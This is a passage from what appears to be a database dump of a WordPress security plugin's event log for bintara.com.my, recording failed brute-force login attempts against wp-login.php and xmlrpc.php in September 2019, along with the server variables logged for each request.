20:38:17',18255672,19555864,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(23932,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.12.109.102\";s:11:\"REMOTE_PORT\";s:5:\"42059\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6kN97nxogXZmwWoWHRKgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568580663.3737\";s:12:\"REQUEST_TIME\";s:10:\"1568580663\";}}','notice','2019-09-15 20:51:05','2019-09-15 20:51:03',17825824,19316080,'https://bintara.com.my/wp-login.php',1,0,'185.12.109.102'),(23933,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.12.109.102\";s:11:\"REMOTE_PORT\";s:5:\"42754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6kO@esTgPVjZVPWmsqPwAAAMs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568580667.5705\";s:12:\"REQUEST_TIME\";s:10:\"1568580667\";}}','notice','2019-09-15 20:51:08','2019-09-15 20:51:07',18254704,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'185.12.109.102'),(23934,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"53556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6m2@esTgPVjZVPWmsqlwAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568581339.3842\";s:12:\"REQUEST_TIME\";s:10:\"1568581339\";}}','notice','2019-09-15 21:02:20','2019-09-15 21:02:19',17739640,19230464,'https://bintara.com.my/wp-login.php',1,0,'167.71.175.204'),(23935,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"54048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6m3t7nxogXZmwWoWHSOQAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568581342.23\";s:12:\"REQUEST_TIME\";s:10:\"1568581342\";}}','notice','2019-09-15 21:02:23','2019-09-15 21:02:22',18254728,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.175.204'),(23936,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-15 21:11:33','2019-09-15 21:11:30',17703880,18167520,'http://bintara.com.my/?page_id=14ref_ucid=AD157A02027A15AD0001027A15ADgid=45964',1,0,'107.158.8.156'),(23937,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"55865\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6pq97nxogXZmwWoWHTVAAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568582059.4057\";s:12:\"REQUEST_TIME\";s:10:\"1568582059\";}}','notice','2019-09-15 21:14:20','2019-09-15 21:14:19',17737040,19228112,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(23938,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"56177\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6prt7nxogXZmwWoWHTVQAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568582062.6561\";s:12:\"REQUEST_TIME\";s:10:\"1568582062\";}}','notice','2019-09-15 21:14:23','2019-09-15 21:14:22',18257912,19557208,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(23939,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"52808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6s2N7nxogXZmwWoWHUiAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568582872.7585\";s:12:\"REQUEST_TIME\";s:10:\"1568582872\";}}','notice','2019-09-15 21:27:54','2019-09-15 21:27:53',17739872,19230272,'https://bintara.com.my/wp-login.php',1,0,'91.191.173.134'),(23940,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"54112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6s3N7nxogXZmwWoWHUigAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568582876.2432\";s:12:\"REQUEST_TIME\";s:10:\"1568582876\";}}','notice','2019-09-15 21:27:57','2019-09-15 21:27:56',18254008,19554224,'https://bintara.com.my/xmlrpc.php',1,0,'91.191.173.134'),(23941,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"52224\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6vRr1rBLb0GV3O7mTCHwAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568583494.9977\";s:12